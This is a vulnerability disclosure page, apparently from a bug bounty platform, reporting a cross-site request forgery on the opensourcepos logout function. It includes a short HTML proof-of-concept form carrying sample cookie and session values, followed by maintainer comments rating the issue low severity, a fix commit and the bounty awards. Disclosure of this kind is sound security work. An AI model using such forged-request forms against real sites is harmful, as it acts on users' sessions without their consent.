Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos


Reported on

Dec 23rd 2021


CSRF on logout functionality. Attacker able to logout the user by sending malicious link

Proof of Concept

<!DOCTYPE html>



<form method="GET" action="">

    <input type="text" name="csrf_cookie_ospos_v3" value="b733af2ee56ba0678b8817af620a02d9">

    <input type="text" name="ospos_session" value="0ba22e9026f4c7c24749ebab3dc6ccea38acd43f">

    <input type="submit" value="Send">





This vulnerability is capable of logout the user session


This is not an attack, it is a kind of annoyance to the user , though it is a valid csrf . By Using post method + csrf token to avoid this

We are processing your report and will contact the opensourcepos team within 24 hours. 2 years ago
We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
We have sent a follow up to the opensourcepos team. We will try again in 7 days. 2 years ago
jekkos validated this vulnerability 2 years ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 years ago


I think this one is rather low severity, maybe some kind of DoS attack can be tricked this way which could be annoying for a user. But beside that the impact is rather low.

jekkos marked this as fixed with commit 9332d1 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation